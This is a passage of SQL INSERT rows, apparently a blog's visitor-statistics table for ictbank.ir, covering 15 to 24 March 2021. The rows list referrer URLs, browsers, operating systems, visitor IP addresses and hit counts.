(9883,'2021-03-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.7.193','000',0,1,0),
(9884,'2021-03-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(9885,'2021-03-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(9886,'2021-03-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(9887,'2021-03-15','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','173.234.151.249','000',0,17,0),
(9888,'2021-03-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(9889,'2021-03-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.3.152.134','000',0,1,0),
(9890,'2021-03-16','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.147','000',0,2,0),
(9891,'2021-03-16','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.146','000',0,2,0),
(9892,'2021-03-16','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.144','000',0,2,0),
(9893,'2021-03-16','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','213.238.167.91','000',0,2,0),
(9894,'2021-03-16','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','213.238.167.67','000',0,2,0),
(9895,'2021-03-16','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.145','000',0,2,0),
(9896,'2021-03-16','design-arena.ir','Chrome','Windows','6.1',NULL,NULL,'','208.94.242.93','000',0,5,0),
(9897,'2021-03-16','design-arena.ir','Chrome','Windows','6.1',NULL,NULL,'','162.144.108.186','000',0,5,0),
(9898,'2021-03-16','design-arena.ir','Chrome','Windows','6.1',NULL,NULL,'','37.97.185.158','000',0,5,0),
(9899,'2021-03-16','design-arena.ir','Chrome','Windows','6.1',NULL,NULL,'','138.197.69.132','000',0,5,0),
(9900,'2021-03-16','design-arena.ir','Chrome','Windows','6.1',NULL,NULL,'','185.183.208.12','000',0,5,0),
(9901,'2021-03-16','design-arena.ir','Chrome','Windows','6.1',NULL,NULL,'','142.4.6.76','000',0,4,0),
(9902,'2021-03-16','design-arena.ir','Chrome','Windows','6.1',NULL,NULL,'','50.31.138.167','000',0,5,0),
(9903,'2021-03-16','design-arena.ir','Chrome','Windows','6.1',NULL,NULL,'','80.247.66.82','000',0,5,0),
(9904,'2021-03-16','design-arena.ir','Chrome','Windows','6.1',NULL,NULL,'','46.101.38.9','000',0,5,0),
(9905,'2021-03-16','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','139.162.238.243','000',0,1,0),
(9906,'2021-03-16','http://ictbank.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','113.189.203.138','000',0,2,0),
(9907,'2021-03-16','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.157','000',0,6,0),
(9908,'2021-03-16','www.google.com','Unknown','Android','7.0',NULL,NULL,'','45.144.225.69','000',0,2,0),
(9909,'2021-03-16','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','188.227.106.151','000',0,1,0),
(9910,'2021-03-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.214.11.201','000',0,1,0),
(9911,'2021-03-16','https://www.google.com/','Chrome','Fedora','Unknown',NULL,NULL,'','219.79.86.239','000',0,1,0),
(9912,'2021-03-16','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(9913,'2021-03-16','http://ictbank.ir/dashtpodcast/archives/podcast/e07-mazarsharif','Android Browser','Android','2.2',NULL,NULL,'','220.181.77.162','000',0,2,0),
(9914,'2021-03-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.203.112','000',0,1,0),
(9915,'2021-03-16','https://www.google.ru/','Chrome','Windows','6.1',NULL,NULL,'','213.222.225.116','000',0,8,0),
(9916,'2021-03-16','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','52.65.15.196','000',0,6,0),
(9917,'2021-03-16','http://ictbank.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','14.254.69.129','000',0,2,0),
(9918,'2021-03-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.217.204','000',0,1,0),
(9919,'2021-03-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(9920,'2021-03-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(9921,'2021-03-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(9922,'2021-03-16','http://design-arena.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','185.81.158.132','000',0,2,0),
(9923,'2021-03-17','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','104.245.145.118','000',0,87,0),
(9924,'2021-03-17','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(9925,'2021-03-17','https://translate.googleusercontent.com/translate_p?hl=it&prev=search&sl=en&u=http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/&depth=1&rurl=translate.google.it&sp=nmt4&pto=aue&usg=ALkJrhgAAAAAYFGfhtPjYYT5pOJlIPZdQFmeMYKw838B','Chrome','Windows','10.0',NULL,NULL,'','66.249.81.221','000',0,1,0),
(9926,'2021-03-17','http://ictbank.ir/blog','Yandex Browser','Windows','10.0',NULL,NULL,'','95.108.244.52','000',0,4,0),
(9927,'2021-03-17','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(9928,'2021-03-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.167.68.215','000',0,1,0),
(9929,'2021-03-17','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.100','000',0,1,0),
(9930,'2021-03-17','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','106.13.56.38','000',0,1,0),
(9931,'2021-03-17','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','62.234.218.151','000',0,3,0),
(9932,'2021-03-17','http://ictbank.ir/blog','Android Browser','Android','10',NULL,NULL,'','85.9.127.165','000',0,1,0),
(9933,'2021-03-17','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.157','000',0,3,0),
(9934,'2021-03-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.149.97.14','000',0,1,0),
(9935,'2021-03-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','132.148.104.139','000',0,2,0),
(9936,'2021-03-17','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','13.232.96.15','000',0,6,0),
(9937,'2021-03-17','http://ictbank.ir/blog','Chrome','Windows','4.0',NULL,NULL,'','176.10.99.200','000',0,3,0),
(9938,'2021-03-17','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','185.220.102.244','000',0,2,0),
(9939,'2021-03-17','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','95.216.145.1','000',0,1,0),
(9940,'2021-03-17','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','185.220.101.132','000',0,2,0),
(9941,'2021-03-17','http://ictbank.ir/blog','Firefox','Windows','6.2',NULL,NULL,'','46.232.251.191','000',0,1,0),
(9942,'2021-03-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.82.216.14','000',0,6,0),
(9943,'2021-03-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.13.106','000',0,1,0),
(9944,'2021-03-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.128.254.37','000',0,1,0),
(9945,'2021-03-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(9946,'2021-03-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(9947,'2021-03-17','http://ictbank.ir/blog','Firefox','Fedora','Unknown',NULL,NULL,'','37.201.192.254','000',0,1,0),
(9948,'2021-03-17','http://ictbank.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','86.120.128.244','000',0,2,0),
(9949,'2021-03-17','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','183.82.189.5','000',0,1,0),
(9950,'2021-03-17','https://www.bing.com/','Safari','OS X','10.15.6',NULL,NULL,'','216.36.13.68','000',0,1,0),
(9951,'2021-03-18','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.100','000',0,1,0),
(9952,'2021-03-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.3.152.134','000',0,1,0),
(9953,'2021-03-18','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','61.161.86.194','000',0,3,0),
(9954,'2021-03-18','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','104.245.145.118','000',0,87,0),
(9955,'2021-03-18','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','52.52.190.187','000',0,6,0),
(9956,'2021-03-18','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','204.83.131.218','000',0,1,0),
(9957,'2021-03-18','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.163.109.66','000',0,1,0),
(9958,'2021-03-18','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','103.233.2.115','000',0,5,0),
(9959,'2021-03-18','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.157','000',0,3,0),
(9960,'2021-03-18','http://www.ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','192.99.18.108','000',0,35,0),
(9961,'2021-03-18','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','198.98.48.175','000',0,3,0),
(9962,'2021-03-18','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','185.220.101.18','000',0,3,0),
(9963,'2021-03-18','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.100.87.206','000',0,2,0),
(9964,'2021-03-18','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.220.102.250','000',0,1,0),
(9965,'2021-03-18','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','103.97.211.10','000',0,3,0),
(9966,'2021-03-18','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','81.214.164.112','000',0,3,0),
(9967,'2021-03-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.82.216.14','000',0,12,0),
(9968,'2021-03-18','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','192.99.18.136','000',0,17,0),
(9969,'2021-03-18','http://ictbank.ir/blog','Chrome','Android','5.1.1',NULL,NULL,'','172.111.219.48','000',0,1,0),
(9970,'2021-03-18','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(9971,'2021-03-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.149.253.238','000',0,1,0),
(9972,'2021-03-18','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','162.247.74.204','000',0,1,0),
(9973,'2021-03-18','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','185.220.101.19','000',0,2,0),
(9974,'2021-03-18','http://ictbank.ir/blog','Chrome','OS X','10.7.5',NULL,NULL,'','185.220.101.21','000',0,3,0),
(9975,'2021-03-18','http://ictbank.ir/blog','Chrome','Windows','4.0',NULL,NULL,'','185.220.100.252','000',0,2,0),
(9976,'2021-03-18','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','51.195.42.226','000',0,1,0),
(9977,'2021-03-18','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','14.183.107.180','000',0,3,0),
(9978,'2021-03-18','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','119.61.0.141','000',0,1,0),
(9979,'2021-03-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.191.74.236','000',0,1,0),
(9980,'2021-03-18','http://ictbank.ir/blog','Firefox','OS X','10.15',NULL,NULL,'','52.212.57.204','000',0,1,0),
(9981,'2021-03-18','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','23.239.14.24','000',0,1,0),
(9982,'2021-03-18','http://ictbank.ir/blog','Chrome','iOS','9.2',NULL,NULL,'','91.241.19.182','000',0,1,0),
(9983,'2021-03-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.213.78','000',0,1,0),
(9984,'2021-03-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(9985,'2021-03-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(9986,'2021-03-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(9987,'2021-03-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','2.190.183.214','000',0,2,0),
(9988,'2021-03-18','http://ictbank.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','176.109.6.11','000',0,2,0),
(9989,'2021-03-19','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.157','000',0,6,0),
(9990,'2021-03-19','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(9991,'2021-03-19','http://82.102.9.14:80/blog','Unknown','Android','10',NULL,NULL,'','121.5.78.29','000',0,2,0),
(9992,'2021-03-19','http://82.102.9.14/blog','Unknown','Android','10',NULL,NULL,'','121.5.76.11','000',0,1,0),
(9993,'2021-03-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(9994,'2021-03-19','http://www.bing.com/search?q=broadcom+fix+for+fedora+33&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=','Internet Explorer','Windows','6.0',NULL,NULL,'','23.100.232.233','000',0,1,0),
(9995,'2021-03-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.88.184.152','000',0,1,0),
(9996,'2021-03-19','https://www.google.com/','Chrome','Linux','Unknown',NULL,NULL,'','90.3.81.79','000',0,1,0),
(9997,'2021-03-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.200.166.195','000',0,1,0),
(9998,'2021-03-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.93.235','000',0,2,0),
(9999,'2021-03-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,2,0),
(10000,'2021-03-19','https://duckduckgo.com/','Firefox','Fedora','Unknown',NULL,NULL,'','188.27.53.91','000',0,1,0),
(10001,'2021-03-19','http://82.102.9.14/blog','Chrome','OS X','10.14.6',NULL,NULL,'','54.196.239.91','000',0,1,0),
(10002,'2021-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.101','000',0,4,0),
(10003,'2021-03-20','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','194.147.140.9','000',0,2,0),
(10004,'2021-03-20','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.239.206.0','000',0,1,0),
(10005,'2021-03-20','http://82.102.9.14:80/blog','Firefox','Windows','6.0',NULL,NULL,'','36.27.208.157','000',0,1,0),
(10006,'2021-03-20','http://ictbank.ir/blog','Chrome','Chrome OS','Unknown',NULL,NULL,'','62.171.148.95','000',0,2,0),
(10007,'2021-03-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(10008,'2021-03-20','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','36.112.86.11','000',0,1,0),
(10009,'2021-03-20','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','42.200.149.213','000',0,1,0),
(10010,'2021-03-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.218.192.31','000',0,1,0),
(10011,'2021-03-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','194.44.61.241','000',0,2,0),
(10012,'2021-03-20','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.157','000',0,3,0),
(10013,'2021-03-20','http://ictbank.ir/blog','Sogou Explorer','Windows','5.2',NULL,NULL,'','117.157.24.3','000',0,1,0),
(10014,'2021-03-20','http://design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','104.245.145.55','000',0,2,0),
(10015,'2021-03-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.10.174.124','000',0,1,0),
(10016,'2021-03-20','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','3.140.241.184','000',0,1,0),
(10017,'2021-03-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.213.78','000',0,1,0),
(10018,'2021-03-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.13.106','000',0,1,0),
(10019,'2021-03-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(10020,'2021-03-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.151.119','000',0,1,0),
(10021,'2021-03-20','http://ictbank.ir/blog','Chrome','Android','7.0',NULL,NULL,'','5.238.40.36','000',0,3,0),
(10022,'2021-03-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','78.38.244.145','000',0,3,0),
(10023,'2021-03-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','31.31.198.136','000',0,8,0),
(10024,'2021-03-21','http://ictbank.ir/blog','Chrome','OS X','10.15.4',NULL,NULL,'','34.247.135.225','000',0,1,0),
(10025,'2021-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.252.147.78','000',0,1,0),
(10026,'2021-03-21','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','117.50.137.13','000',0,2,0),
(10027,'2021-03-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','96.126.103.73','000',0,1,0),
(10028,'2021-03-21','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.157','000',0,6,0),
(10029,'2021-03-21','http://82.102.9.14/blog','Chrome','Windows','6.1',NULL,NULL,'','120.52.152.19','000',0,3,0),
(10030,'2021-03-21','http://82.102.9.14/blog','Chrome','Windows','6.1',NULL,NULL,'','106.75.85.103','000',0,2,0),
(10031,'2021-03-21','http://www.ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','106.75.118.223','000',0,1,0),
(10032,'2021-03-21','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','106.75.26.68','000',0,2,0),
(10033,'2021-03-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.42.139.112','000',0,1,0),
(10034,'2021-03-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','113.128.104.35','000',0,1,0),
(10035,'2021-03-21','http://ictbank.ir/blog','Opera','Linux','Unknown',NULL,NULL,'','51.77.52.160','000',0,1,0),
(10036,'2021-03-21','http://ictbank.ir/blog','Safari','iOS','3.0',NULL,NULL,'','220.181.77.162','000',0,3,0),
(10037,'2021-03-21','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.235.244.26','000',0,1,0),
(10038,'2021-03-21','http://design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','104.245.145.54','000',0,2,0),
(10039,'2021-03-21','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(10040,'2021-03-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.211.143.88','000',0,1,0),
(10041,'2021-03-21','http://82.102.9.14/blog/','Internet Explorer','Windows','6.1',NULL,NULL,'','182.48.105.210','000',0,1,0),
(10042,'2021-03-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.7.193','000',0,1,0),
(10043,'2021-03-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.93.235','000',0,1,0),
(10044,'2021-03-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.151.119','000',0,1,0),
(10045,'2021-03-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(10046,'2021-03-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(10047,'2021-03-22','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','82.3.76.146','000',0,2,0),
(10048,'2021-03-22','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','35.185.241.102','000',0,3,0),
(10049,'2021-03-22','https://duckduckgo.com/','Chrome','Linux','Unknown',NULL,NULL,'','88.126.195.110','000',0,1,0),
(10050,'2021-03-22','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','62.210.92.175','000',0,1,0),
(10051,'2021-03-22','http://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','23.228.109.147','000',0,2,0),
(10052,'2021-03-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','45.33.102.90','000',0,1,0),
(10053,'2021-03-22','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','51.38.70.190','000',0,1,0),
(10054,'2021-03-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.160.111.166','000',0,1,0),
(10055,'2021-03-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.33.167.164','000',0,1,0),
(10056,'2021-03-22','http://ictbank.ir/blog','Edge','Windows','10.0',NULL,NULL,'','37.179.14.99','000',0,2,0),
(10057,'2021-03-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.213.78','000',0,1,0),
(10058,'2021-03-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.7.193','000',0,1,0),
(10059,'2021-03-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(10060,'2021-03-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(10061,'2021-03-22','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.157','000',0,3,0),
(10062,'2021-03-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','145.255.21.27','000',0,6,0),
(10063,'2021-03-22','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','219.232.6.170','000',0,1,0),
(10064,'2021-03-22','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(10065,'2021-03-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(10066,'2021-03-22','http://82.102.9.14/blog','Firefox','Windows','10.0',NULL,NULL,'','35.230.7.148','000',0,1,0),
(10067,'2021-03-22','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','181.47.151.10','000',0,1,0),
(10068,'2021-03-23','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.220.204.184','000',0,1,0),
(10069,'2021-03-23','http://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','23.228.109.147','000',0,2,0),
(10070,'2021-03-23','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','5.188.62.214','000',0,1,0),
(10071,'2021-03-23','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','181.174.105.242','000',0,1,0),
(10072,'2021-03-23','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','54.189.230.128','000',0,1,0),
(10073,'2021-03-23','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','3.140.241.184','000',0,3,0),
(10074,'2021-03-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.25.194.60','000',0,1,0),
(10075,'2021-03-23','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','193.46.255.64','000',0,1,0),
(10076,'2021-03-23','http://design-arena.ir/blog','Firefox','OS X','10.12',NULL,NULL,'','3.239.181.102','000',0,1,0),
(10077,'2021-03-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.255.133.51','000',0,1,0),
(10078,'2021-03-23','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.157','000',0,3,0),
(10079,'2021-03-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.216.203.157','000',0,1,0),
(10080,'2021-03-23','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','111.230.178.135','000',0,1,0),
(10081,'2021-03-23','http://ictbank.ir/blog','Unknown','iOS','11.3',NULL,NULL,'','183.185.21.102','000',0,1,0),
(10082,'2021-03-23','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','89.218.83.168','000',0,1,0),
(10083,'2021-03-23','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,1,0),
(10084,'2021-03-23','http://design-arena.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','152.67.228.28','000',0,3,0),
(10085,'2021-03-23','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(10086,'2021-03-23','https://duckduckgo.com/','Chrome','Fedora','Unknown',NULL,NULL,'','105.163.210.151','000',0,1,0),
(10087,'2021-03-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.151.119','000',0,1,0),
(10088,'2021-03-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.7.193','000',0,1,0),
(10089,'2021-03-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,2,0),
(10090,'2021-03-23','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.163.109.66','000',0,1,0),
(10091,'2021-03-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.252.147.78','000',0,1,0),
(10092,'2021-03-24','https://www.google.com/','Chrome','Fedora','Unknown',NULL,NULL,'','2.190.243.94','000',0,1,0),
(10093,'2021-03-24','http://ictbank.ir/blog','Firefox','OS X','10.12',NULL,NULL,'','3.239.181.102','000',0,1,0),
(10094,'2021-03-24','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(10095,'2021-03-24','http://ictbank.ir/blog','Chrome','Windows','5.2',NULL,NULL,'','39.71.165.90','000',0,1,0),
(10096,'2021-03-24','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.157','000',0,6,0),
(10097,'2021-03-24','http://ictbank.ir/blog/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899/','Chrome','Windows','6.1',NULL,NULL,'','45.128.133.242','000',0,1,0),
(10098,'2021-03-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.162.234.160','000',0,1,0),
(10099,'2021-03-24','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.130','000',0,1,0),
(10100,'2021-03-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(10101,'2021-03-24','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.100','000',0,1,0),
(10102,'2021-03-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.218.225.207','000',0,1,0),
(10103,'2021-03-24','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','54.189.230.128','000',0,1,0),
(10104,'2021-03-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.93.235','000',0,1,0),
(10105,'2021-03-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.217.204','000',0,1,0),
(10106,'2021-03-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,2,0),
(10107,'2021-03-24','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','27.115.124.99','000',0,1,0),
